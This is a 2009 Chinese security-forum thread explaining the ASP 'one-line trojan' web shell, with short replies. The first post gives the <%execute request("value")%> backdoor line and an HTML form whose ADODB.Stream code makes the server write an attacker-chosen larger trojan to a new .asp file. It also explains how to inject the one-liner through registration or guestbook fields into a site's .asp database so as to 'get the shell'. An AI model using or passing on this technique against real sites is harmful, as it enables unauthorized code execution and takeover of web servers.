标题:
[转载]
ASP一句话木马原理
[打印本页]
作者:
plantseth
时间:
2009-6-2 17:15
标题:
ASP一句话木马原理
前不久,跟一个网友测试网站.各方面的安全性做的还不错.用了各种方法都没拿下SHELL,最后被我用一句话木马搞定了.心血来潮,就写了这篇文章,希望能给一些朋友带来点帮助.
要知道,一般我们无法查看网站的ASP源码,那么换个思路,我们可不可以把ASP语句写入网站呢?这样的话,嘿嘿.......
相信懂ASP的人都不陌生,在ASP里有一句语句<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.
(现在先假设在远程主机的TEXT.ASP中已经有了<%execute request("value")%>这个语句.)就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)
<form action=http://主机路径/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>
</form>
开先我们不是假设远程主机的TEXT.ASP这个文件里有这么<%execute request("value")%>一句吗?表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)
说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.
具体的就是下面这一段:
set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已覆 盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp
这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.
啊,基本说完了,对于不懂ASP的朋友,理解起来是有点难度.
好,刚才是假设主机存在<%execute request("value")%>那么对于平常的网站又没有这句我们怎么下手呢
有个条件,假如你得到了它的数据库名,(当然我这里说的是它的后缀是以ASP结尾的,你下载不了它的数据库,要不然的话我这篇文章不是白写了吗)那么你就在网站留言也好,论坛也好,注册也好,只要有表单的地方写入这名<%execute request("value")%>,比如说注册的名字你用这个.不行的话写在简介里啊等.......
只要注册成功,那么它的数据库里就含有了<%execute request("value")%>这个语句.那么表单的路径就换为
<form action=http://主机路径/数据库名.ASP method=post>
好了,把你的大马写在第二个表单里提交吧.
等着拿SHELL吧!
作者:
winver
时间:
2009-6-2 21:35
等我学了ASP着一定要用用
作者:
394931603
时间:
2009-6-8 09:18
1#
plantseth
假如留言那里把<>替换了是不是就不可以了。
作者:
zrz444
时间:
2009-6-8 15:14
这个好象很久了吧??
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2